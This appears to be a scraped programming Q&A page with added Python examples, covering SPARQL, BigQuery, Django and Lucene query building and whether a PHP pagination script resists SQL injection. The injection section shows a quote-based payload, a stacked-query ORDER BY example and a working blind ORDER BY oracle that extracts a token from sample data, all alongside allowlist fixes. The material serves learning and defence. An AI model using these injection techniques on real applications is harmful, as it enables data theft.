Encoding/providing string & integer values in SPARQL GET requests - sparql

I have a sparql query with a FILTER statement as follows:
FILTER ((?dayOfWeek = ?day) && (?start >= ?startTime) && (?finish <= ?finishTime))
I know that this query runs correctly if I replace the variables with literal values and execute it on snorql:
FILTER ((?dayOfWeek = "Wed") && (?start >= 720) && (?finish <= 820))
I want to provide the values via a GET request instead, so something like:
...sparql?query=<query>&day=Wed&startTime=720&finishTime=820
However, the above request doesn't work (it returns an empty data set). I've tried specifying the types of startTime and finishTime, i.e.
...sparql?query=<query>&day=Wed&startTime=720&startTime_type=integer&finishTime=820&finishTime_type=integer
but this doesn't fix the issue.
Providing the literal values that work on snorql in the query string also results in an empty dataset, which is really puzzling me.
I assume that I must either be providing the values in the wrong way, or encoding them incorrectly. The query string itself has been percent escaped (character set: !*'();:#&=+$,/?%#[]).
Any suggestions?

If you are using the SPARQL protocol, the usage is
...sparql?query=PREFIX .. SELECT...
i.e. a complete SPARQL query (encoded for being in a URL).
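To make the answer concrete, here is an added example (not code from the original post or answer) that builds the GET URL the SPARQL protocol expects. The protocol carries one complete query in the query= parameter and nothing else, so the day/start/finish values have to be written into the query text before it is percent-encoded; the extra &day=...&startTime=... arguments in the question are simply not part of the protocol. Pasting raw request values into the query text would be a SPARQL injection risk, so the string value is escaped as a SPARQL literal and the numbers are type-checked first. The endpoint URL, the prefix and the triple patterns are assumptions; only the FILTER line comes from the question.

```python
"""Build a SPARQL protocol GET URL with the FILTER values filled in.

Added example. The endpoint, prefix and triple patterns below are assumed
for illustration; the FILTER expression is the one from the question.
"""
from urllib.parse import urlencode, urlparse, parse_qs

ENDPOINT = "http://example.org/sparql"  # assumed endpoint

# Assumed query skeleton; only the FILTER line comes from the question.
QUERY_TEMPLATE = """PREFIX ex: <http://example.org/schema#>
SELECT ?slot ?start ?finish WHERE {{
  ?slot ex:dayOfWeek ?dayOfWeek ; ex:start ?start ; ex:finish ?finish .
  FILTER ((?dayOfWeek = {day}) && (?start >= {start}) && (?finish <= {finish}))
}}"""


def sparql_string_literal(value: str) -> str:
    """Quote value as a SPARQL string literal.

    Backslash, double quote and control characters are escaped as in the
    grammar's ECHAR rule, so a quote inside the value cannot terminate the
    literal early and smuggle extra FILTER syntax into the query.
    """
    escapes = {"\\": "\\\\", '"': '\\"', "\n": "\\n", "\r": "\\r", "\t": "\\t"}
    return '"' + "".join(escapes.get(ch, ch) for ch in value) + '"'


def sparql_integer(value) -> str:
    """Accept only a real int; a string such as '720) || true' is refused."""
    if isinstance(value, bool) or not isinstance(value, int):
        raise TypeError(f"expected int, got {type(value).__name__}")
    return str(value)


def build_query(day: str, start_time: int, finish_time: int) -> str:
    """Substitute the three values into the query text, each in its typed form."""
    return QUERY_TEMPLATE.format(
        day=sparql_string_literal(day),
        start=sparql_integer(start_time),
        finish=sparql_integer(finish_time),
    )


def build_get_url(day: str, start_time: int, finish_time: int) -> str:
    """The whole query goes into the single query= parameter, percent-encoded."""
    return ENDPOINT + "?" + urlencode({"query": build_query(day, start_time, finish_time)})


def query_from_url(url: str) -> str:
    """What the endpoint sees after decoding the URL (for a round-trip check)."""
    return parse_qs(urlparse(url).query)["query"][0]


if __name__ == "__main__":
    print(build_get_url("Wed", 720, 820))
```

urlencode() percent-encodes every reserved character in the query text, including the # in the prefix IRI and the ? that starts each variable, so the encoded string survives being placed in a URL; query_from_url() shows the endpoint receives exactly the text build_query() produced.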

Related

How can you run a query in BigQuery to match logs where the callerIP is not within a certain list of IP ranges?

I am trying to run the following query in BigQuery - I am confident that the rest of the query is correct however the only issue is how I have listed the IP addresses in the line below. I am being presented with the error message "Encountered " <FLOATING_LITERAL> "x.y "" at line 17, column 62" ( where x and y are integers)
  AND NOT (protopayload_auditlog.requestMetadata.callerIp : "IP-RANGE IP-RANGE IP-RANGE IP-RANGE")
Where IP-RANGE is of course of the form x.y.z.f-x.y.z.e
I am not sure how to format this string of IP addresses to make the query work. Would be really grateful for some assistance!
The below, is the full query;
#legacySQL
SELECT
  protopayload_auditlog.authenticationInfo.principalEmail AS principalEmail,
  resource.labels.project_id AS project_id,
  resource.labels.bucket_name AS bucket_name,
  resource.labels.method AS method,
  protopayload_auditlog.requestMetadata.callerIp AS callerIp,
  timestamp AS timestamp
FROM (TABLE_DATE_RANGE([projectid.organisation_audit_logging.cloudaudit_googleapis_com_data_access_],
      DATE_ADD(CURRENT_TIMESTAMP(), -40, 'DAY'),
      DATE_ADD(CURRENT_TIMESTAMP(), -38, 'DAY')))
WHERE
  protopayload_auditlog.serviceName = "storage.googleapis.com"
  AND resource.labels.method = 'google.storage.objects.get'
  AND REGEXP_MATCH(protopayload_auditlog.authenticationInfo.principalEmail, r"^.*#mycompany\.com")
  AND NOT (protopayload_auditlog.requestMetadata.callerIp : "IP-RANGE IP-RANGE IP-RANGE IP-RANGE")
LIMIT 500
You can use the approach below as a starting point; you can wrap all the lengthy parts into a UDF to make it compact and readable.
AND NOT NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(protopayload_auditlog.requestMetadata.callerIp))
    BETWEEN NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(ip_range1_start))
        AND NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(ip_range1_end))
AND NOT NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(protopayload_auditlog.requestMetadata.callerIp))
    BETWEEN NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(ip_range2_start))
        AND NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(ip_range2_end))
...
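The following added example (not from the question or the answer) shows the same "caller is outside every start-end range" condition in plain Python, run over constructed audit-log rows, and renders a list of x.y.z.f-x.y.z.e ranges into the Standard SQL predicate the answer sketches. Two caveats a practitioner would want: the NET.* functions are Standard SQL, so the posted #legacySQL query would have to be converted (legacy SQL has PARSE_IP instead), and NET.IPV4_TO_INT64 errors on the 16-byte value NET.SAFE_IP_FROM_STRING returns for an IPv6 caller, so IPv6-capable logs need a byte-length guard; the Python version below mirrors SAFE_IP_FROM_STRING by dropping anything that is not an IPv4 address. The ranges and log rows are constructed sample data.

```python
"""Exclude callers inside trusted IP ranges, as the BETWEEN approach does.

Added example with constructed data. Evaluates the exclusion in Python and
renders the BigQuery Standard SQL predicate for a list of ranges.
"""
import ipaddress

# Constructed trusted ranges in the question's x.y.z.f-x.y.z.e form.
TRUSTED_RANGES = ["10.0.0.1-10.0.0.50", "192.168.1.10-192.168.1.20"]

# Constructed audit-log rows: (principalEmail, callerIp).
SAMPLE_ROWS = [
    ("alice@mycompany.com", "10.0.0.7"),       # inside range 1
    ("bob@mycompany.com", "203.0.113.9"),      # outside both
    ("carol@mycompany.com", "192.168.1.20"),   # on the inclusive upper bound
    ("dave@mycompany.com", "192.168.1.21"),    # one past it
    ("eve@mycompany.com", "not-an-ip"),        # unparsable, as SAFE_IP_FROM_STRING -> NULL
]

CALLER_IP_COLUMN = "protopayload_auditlog.requestMetadata.callerIp"


def parse_range(text: str) -> tuple:
    """'a.b.c.d-e.f.g.h' -> (int, int); rejects reversed or malformed ranges."""
    start, end = (ipaddress.IPv4Address(p.strip()) for p in text.split("-", 1))
    if end < start:
        raise ValueError(f"range end precedes start: {text}")
    return int(start), int(end)


def ip_to_int(text: str):
    """Mirror NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING(x)): None on bad input."""
    try:
        return int(ipaddress.IPv4Address(text))
    except ipaddress.AddressValueError:
        return None


def outside_all_ranges(ip_text: str, ranges: list) -> bool:
    """NOT (ip BETWEEN lo AND hi) for every range, with SQL NULL semantics:
    an unparsable address makes the predicate NULL, so the row is dropped."""
    n = ip_to_int(ip_text)
    if n is None:
        return False
    return not any(lo <= n <= hi for lo, hi in ranges)


def external_callers(rows: list, range_texts: list) -> list:
    """Rows whose callerIp lies outside every trusted range."""
    ranges = [parse_range(r) for r in range_texts]
    return [(email, ip) for email, ip in rows if outside_all_ranges(ip, ranges)]


def render_sql_predicate(range_texts: list, column: str = CALLER_IP_COLUMN) -> str:
    """One AND NOT ... BETWEEN ... line per range, validated before emission.

    Only literal IPv4 addresses from parse_range() are interpolated, so the
    generated SQL cannot carry anything but dotted quads.
    """
    ip_expr = f"NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING({column}))"
    lines = []
    for text in range_texts:
        lo, hi = (str(ipaddress.IPv4Address(n)) for n in parse_range(text))
        lines.append(
            f"AND NOT {ip_expr} BETWEEN "
            f"NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING('{lo}')) "
            f"AND NET.IPV4_TO_INT64(NET.SAFE_IP_FROM_STRING('{hi}'))"
        )
    return "\n".join(lines)


if __name__ == "__main__":
    for email, ip in external_callers(SAMPLE_ROWS, TRUSTED_RANGES):
        print(email, ip)
    print(render_sql_predicate(TRUSTED_RANGES))
```

The rendered predicate is what goes in place of the `callerIp : "IP-RANGE ..."` line; pasting it into a Standard SQL version of the query (or into a UDF, as the answer suggests) keeps the range list in one place.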

How to create a correct filter string with OR and AND operators for django?

My app has a frontend on Vue.js and a backend on Django REST framework. I need to build a filter string in Vue that does something like this:
((status=closed) | (status=canceled)) & (priority=middle)
but got an error as a response
["Invalid querystring operator. Matched: ') & '."]
After encoding my string looks like this:
?filters=((status%3D%D0%97%D0%B0%D0%BA%D1%80%D1%8B%D1%82)%20%7C%20(status%3D%D0%9E%D1%82%D0%BA%D0%BB%D0%BE%D0%BD%D0%B5%D0%BD))%20%26%20(priority%3D%D0%A1%D1%80%D0%B5%D0%B4%D0%BD%D0%B8%D0%B9)
which corresponds to
?filters=((status=closed)|(status=canceled))&(priority=middle)
What should a correct filter string for Django look like?
I have no problem if statement includes only | or only &. For example filter string like this one works perfect:
?filters=(status%3D%D0%97%D0%B0%D0%BA%D1%80%D1%8B%D1%82)%20%7C%20(status%3D%D0%9E%D1%82%D0%BA%D0%BB%D0%BE%D0%BD%D0%B5%D0%BD)
a.k.a. ?filters=(status=closed)|(status=canceled). But if I add an & after it and additional brackets to specify the order of evaluation, it fails with an error.
I also tried to reduce usage of brackets and had string like this (as experiment):
?filters=(status%3D%D0%97%D0%B0%D0%BA%D1%80%D1%8B%D1%82%20%7C%20status%3D%D0%9E%D1%82%D0%BA%D0%BB%D0%BE%D0%BD%D0%B5%D0%BD)
a.k.a. ?filters=(status=closed | status=canceled). This one doesn't work either: I get neither an error nor the data.
I need mixed results in my case: both statuses (closed and canceled) and priority=middle, but my string format isn't correct. Please explain which format would be OK.
That doesn't look like a very URI-friendly syntax you're trying to use there.
Try doing this instead:
?status[]=closed&status[]=cancelled&priority=middle
Then use request.GET.getlist('status[]') to get back the list and use the values for logical OR queryset filtering:
qs = qs.filter(status__in=request.GET.getlist('status[]', []))
and then add any additional filtering, which works as logical AND.
If you're using axios, it should automatically format a JS array in the status URL param into this form.
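An added example (not from the answer) of the server side of this scheme, without importing Django: the standard-library parse_qs stands in for request.GET, and its list values play the role of getlist(). The filterable parameters and their allowed values are assumptions. The design point worth keeping is that the server names the fields and values that may be filtered and translates them into ORM lookups itself, rather than parsing a boolean mini-language supplied by the client.

```python
"""Turn ?status[]=...&status[]=...&priority=... into Django filter kwargs.

Added example. parse_qs replaces request.GET; FILTERS is an assumed
allowlist of query parameters -> (ORM lookup, permitted values).
"""
from urllib.parse import parse_qs, urlencode

FILTERS = {
    "status[]": ("status__in", {"open", "closed", "cancelled"}),
    "priority": ("priority", {"low", "middle", "high"}),
}


def filter_kwargs(query_string: str) -> dict:
    """Build the kwargs for qs.filter(**kwargs), rejecting anything not allowlisted.

    Repeated status[] values become one status__in list (logical OR);
    every distinct parameter is a separate kwarg, which filter() combines
    with logical AND.
    """
    params = parse_qs(query_string.lstrip("?"))
    kwargs = {}
    for key, values in params.items():
        if key not in FILTERS:
            raise ValueError(f"unknown filter parameter: {key}")
        lookup, allowed = FILTERS[key]
        rejected = sorted(set(values) - allowed)
        if rejected:
            raise ValueError(f"invalid value(s) for {key}: {rejected}")
        if lookup.endswith("__in"):
            kwargs[lookup] = sorted(set(values))   # getlist() equivalent
        else:
            kwargs[lookup] = values[-1]            # QueryDict.get() returns the last value
    return kwargs


def accepted(query_string: str) -> bool:
    """True when the query string passes the allowlist, False otherwise."""
    try:
        filter_kwargs(query_string)
        return True
    except ValueError:
        return False


def encode_query(statuses: list, priority: str) -> str:
    """The bracket-array form the answer describes, as a client would send it."""
    pairs = [("status[]", s) for s in statuses] + [("priority", priority)]
    return "?" + urlencode(pairs)


if __name__ == "__main__":
    url = encode_query(["closed", "cancelled"], "middle")
    print(url)
    print(filter_kwargs(url))
```

In the view, `qs = qs.filter(**filter_kwargs(request.META["QUERY_STRING"]))` (or the equivalent over request.GET) applies the result; the question's `((status=closed)|(status=canceled))&(priority=middle)` form is rejected as an unknown parameter rather than being parsed.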

Rally custom list query not working on string custom field

I have a custom field being added on user story (HierarchicalRequirement) level.
The WSAPI documentation shows the following details for the field:
c_CustomFieldName
Required false
Type string
Max Length 32,768
Sortable true
Explicit Fetch false
Query Expression Operators contains, !contains, =, !=
When trying to create a report using Custom List to identify user stories where this field is empty, I add (c_CustomFieldName = "") to the query.
And yet, the result shows rows where this field is not empty.
How can that be?
I tried querying on null, but it didn't work.
Thanks in advance
What you're doing should work; are you getting errors, or just incorrect data? It almost seems like it's ignoring your query altogether.
I tried to repro both with the custom list app and against wsapi directly and the following all worked as expected:
(c_CustomText = "") //empty
(c_CustomText = null) //empty
(c_CustomText != "") //non-empty
(c_CustomText != null) //non-empty
It's possible you're running into some weird data-specific edge case in your data. It may be worth following up with support.

SQL Injection: is this secure?

I have this site with the following parameters:
http://www.example.com.com/pagination.php?page=4&order=comment_time&sc=desc
I use the values of each of the parameters as a value in a SQL query.
I am trying to test my application and ultimately hack my own application for learning purposes.
I'm trying to inject this statement:
http://www.example.com.com/pagination.php?page=4&order=comment_time&sc=desc' or 1=1 --
But It fails, and MySQL says this:
Warning: mysql_fetch_assoc() expects parameter 1 to be resource,
boolean given in /home/dir/public_html/pagination.php on line 132
Is my application completely free from SQL injection, or is it still possible?
EDIT: Is it possible for me to find a valid sql injection statement to input into one of the parameters of the URL?
An application secured from SQL injection never produces invalid queries.
So obviously you still have some issues.
A well-written application produces valid and expected output for any input.
That's completely vulnerable, and the fact that you can cause a syntax error proves it.
There is no function to escape column names or order by directions. Those functions do not exist because it is bad style to expose the DB logic directly in the URL, because it makes the URLs dependent on changes to your database logic.
I'd suggest something like an array mapping the "order" parameter values to column names:
$order_cols = array(
    'time'    => 'comment_time',
    'popular' => 'comment_score',
    // ... and so on ...
);
if (!isset($order_cols[$_GET['order']])) {
    $_GET['order'] = 'time';
}
$order = $order_cols[$_GET['order']];
Restrict "sc" manually:
if ($_GET['sc'] == 'asc' || $_GET['sc'] == 'desc') {
    $order .= ' ' . $_GET['sc'];
} else {
    $order .= ' desc';
}
Then you're guaranteed safe to append that to the query, and the URL is not tied to the DB implementation.
I'm not 100% certain, but I'd say it still seems vulnerable to me -- the fact that it's accepting the single-quote (') as a delimiter and then generating an error off the subsequent injected code says to me that it's passing things it shouldn't on to MySQL.
Any data that could possibly be taken from somewhere other than your application itself should go through mysql_real_escape_string() first. This way the whole ' or 1=1 part gets passed as a value to MySQL... unless you're passing "sc" straight through for the sort order, such as
$sql = "SELECT * FROM foo WHERE page='{$_REQUEST['page']}' ORDER BY data {$_REQUEST['sc']}";
... which you also shouldn't be doing. Try something along these lines:
$page = mysql_real_escape_string($_REQUEST['page']);
if ($_REQUEST['sc'] == "desc")
    $sortorder = "DESC";
else
    $sortorder = "ASC";
$sql = "SELECT * FROM foo WHERE page='{$page}' ORDER BY data {$sortorder}";
I still couldn't say it's TOTALLY injection-proof, but it's definitely more robust.
I am assuming that your generated query does something like
select <some number of fields>
from <some table>
where sc=desc
order by comment_time
Now, if I were to attack the order by statement instead of the WHERE, I might be able to get some results... Imagine I added the following
comment_time; select top 5 * from sysobjects
the query being returned to your front end would be the top 5 rows from sysobjects, rather than the query you tried to generate (depending a lot on the front end)...
It really depends on how PHP validates those arguments. If MySQL is giving you a warning, it means that an attacker has already passed through your first line of defence, which is your PHP script.
Use if(!preg_match('/^regex_pattern$/', $your_input)) to filter all your inputs before passing them to MySQL.
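To settle what the answers argue about, here is an added example (not code from the thread, and Python with SQLite rather than the question's PHP and MySQL) that runs the three points against a constructed table: the sc=desc' or 1=1 -- payload fails with a parse error because the value reaches the SQL parser, which is what the mysql_fetch_assoc() warning shows; an attacker who keeps the ORDER BY expression syntactically valid gets no error at all and can use the row order as a yes/no oracle to read data the page never displays, which goes beyond the stacked-query example above but is the same ORDER BY attack surface; and the accepted answer's allowlist mapping, plus binding the page number as a parameter, removes both. Table name, column names and sample rows are assumptions.

```python
"""pagination.php-style parameters: concatenated vs. allowlisted, on SQLite.

Added example with constructed data. The table layout (comments with an
admin token column) is assumed so that there is something to leak.
"""
import sqlite3

# Constructed sample rows: (id, page, comment_time, author, token)
SAMPLE_ROWS = [
    (1, 4, "2021-01-03", "alice", "hunter2"),
    (2, 4, "2021-01-01", "bob", "letmein"),
    (3, 4, "2021-01-02", "admin", "s3cret"),
    (4, 5, "2021-01-04", "carol", "qwerty"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER, page INTEGER, "
                 "comment_time TEXT, author TEXT, token TEXT)")
    conn.executemany("INSERT INTO comments VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_ids(conn, page, order, sc) -> list:
    """The pattern the question describes: request values pasted into SQL."""
    sql = f"SELECT id FROM comments WHERE page = {page} ORDER BY {order} {sc}"
    return [row[0] for row in conn.execute(sql)]


def syntax_error_on_injection(conn) -> bool:
    """The question's payload. The stray quote is a parse error (the MySQL
    warning the asker saw); an error here proves the input reached SQL."""
    try:
        vulnerable_ids(conn, 4, "comment_time", "desc' or 1=1 --")
    except sqlite3.OperationalError:
        return True
    return False


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def oracle(conn, prefix: str) -> bool:
    """A syntactically valid ORDER BY expression: sorts by id when the guess
    is right and by -id when it is wrong, so the visible row order answers
    a yes/no question about a column the page never shows."""
    expr = (f"CASE WHEN (SELECT substr(token, 1, {len(prefix)}) FROM comments "
            f"WHERE author = 'admin') = '{prefix}' THEN id ELSE -id END")
    return vulnerable_ids(conn, 4, expr, "asc") == [1, 2, 3]


def recover_admin_token(conn, max_len: int = 16) -> str:
    """Character-by-character extraction using only the row order."""
    known = ""
    for _ in range(max_len):
        for ch in ALPHABET:
            if oracle(conn, known + ch):
                known += ch
                break
        else:
            break  # no character extends the prefix: token complete
    return known


# Hardened version: the accepted answer's allowlist, in Python.
ORDER_COLS = {"time": "comment_time", "id": "id"}  # public name -> real column


def safe_ids(conn, page, order, sc) -> list:
    """Only allowlisted identifiers reach the SQL text; page is a bound value."""
    column = ORDER_COLS.get(order, ORDER_COLS["time"])   # unknown -> default
    direction = "DESC" if sc == "desc" else "ASC"        # exactly two outcomes
    page_number = int(page)                               # ValueError on garbage
    sql = f"SELECT id FROM comments WHERE page = ? ORDER BY {column} {direction}"
    return [row[0] for row in conn.execute(sql, (page_number,))]


if __name__ == "__main__":
    db = make_db()
    print("syntax error on quote payload:", syntax_error_on_injection(db))
    print("token leaked via ORDER BY oracle:", recover_admin_token(db))
    print("hardened, injected sc ignored:", safe_ids(db, "4", "time", "desc' or 1=1 --"))
```

Escaping functions do not help for ORDER BY because column names and directions are identifiers, not string values; that is why the hardened version maps public names to columns and never interpolates anything the client sent.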

lucene query issue

I am using Lucene with Alfresco. Here is my query:
( TYPE:"{com.company.customised.content.model}test" && (#\{com.company.customised.content.model\}testNo:111 && (#\{com.company.customised.content.model\}skill:or))
I have to search documents which are having property skill of value "or". The above query is not giving any results (I am getting failed to parse query).
If I use the query up until testNo (ignoring skill), I am getting proper results:
( TYPE:"{com.company.customised.content.model}test" && (#\{com.company.customised.content.model\}testNo:111))
Can you please help me?
Thanks
Unfortunately, "or" is a reserved keyword in Lucene. Therefore, Lucene fails to properly interpret your query, because Lucene thinks you are referring to the OR boolean operator. You may want to try wrapping the or in double quotes:
( TYPE:"{com.company.customised.content.model}test" && (#\{com.company.customised.content.model\}testNo:111 && (#\{com.company.customised.content.model\}skill:"or")))
I am not familiar with Alfresco, so you may not be able to do this.
Yes, or is a reserved keyword in Lucene, but if you are querying by a property of type number you can give your value directly; if it is of type d:text or string, you have to give your value in double quotes " ".
( TYPE:"{com.company.customised.content.model}test" && (#{com.company.customised.content.model}testNo:111 && (#{com.company.customised.content.model}skill:"or")))
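The rule the two answers converge on (numbers bare, text quoted) generalises into a small query builder. The following is an added example, not code from the thread or from Alfresco: it quotes every text value and escapes the quote and backslash characters inside it, so a reserved word such as or, or any Lucene syntax character in a user-supplied search term, is read as data rather than as part of the query structure. The unescaped #{namespace}name field form follows the last answer; whether the braces need backslash-escaping depends on the Alfresco version and is not verified here, and the reserved-word check treats or case-insensitively because that is the behaviour the thread reports.

```python
"""Build an Alfresco Lucene query with property values quoted safely.

Added example. Field syntax follows the last answer (#{namespace}name);
the reserved-word list is Lucene's boolean operators.
"""
RESERVED_WORDS = {"AND", "OR", "NOT"}
RESERVED_SYMBOLS = {"&&", "||", "!"}
SPECIAL_CHARS = set('+-!(){}[]^"~*?:\\/&|')


def would_parse_as_operator(value: str) -> bool:
    """True when a bare value would be taken for a boolean operator, as "or" was."""
    stripped = value.strip()
    return stripped.upper() in RESERVED_WORDS or stripped in RESERVED_SYMBOLS


def needs_quoting(value: str) -> bool:
    """True when a bare value would not survive the parser as a single term."""
    return (would_parse_as_operator(value) or not value
            or any(c.isspace() or c in SPECIAL_CHARS for c in value))


def lucene_value(value) -> str:
    """Numbers go in bare; all text is quoted with " and \\ escaped inside."""
    if isinstance(value, (int, float)) and not isinstance(value, bool):
        return str(value)
    escaped = str(value).replace("\\", "\\\\").replace('"', '\\"')
    return f'"{escaped}"'


def type_clause(namespace: str, type_name: str) -> str:
    return f'TYPE:"{{{namespace}}}{type_name}"'


def property_clause(namespace: str, name: str, value) -> str:
    return f"#{{{namespace}}}{name}:{lucene_value(value)}"


def build_query(namespace: str, type_name: str, properties: dict) -> str:
    """TYPE restriction AND every property match, with balanced parentheses."""
    clauses = [type_clause(namespace, type_name)]
    clauses += [property_clause(namespace, k, v) for k, v in properties.items()]
    return "(" + " && ".join(clauses) + ")"


if __name__ == "__main__":
    ns = "com.company.customised.content.model"
    print(build_query(ns, "test", {"testNo": 111, "skill": "or"}))
```

For the question's values this yields one balanced query with testNo:111 bare and skill:"or" quoted; a search term like `a) || TYPE:"{x}y" || (b` is quoted the same way and cannot widen the query.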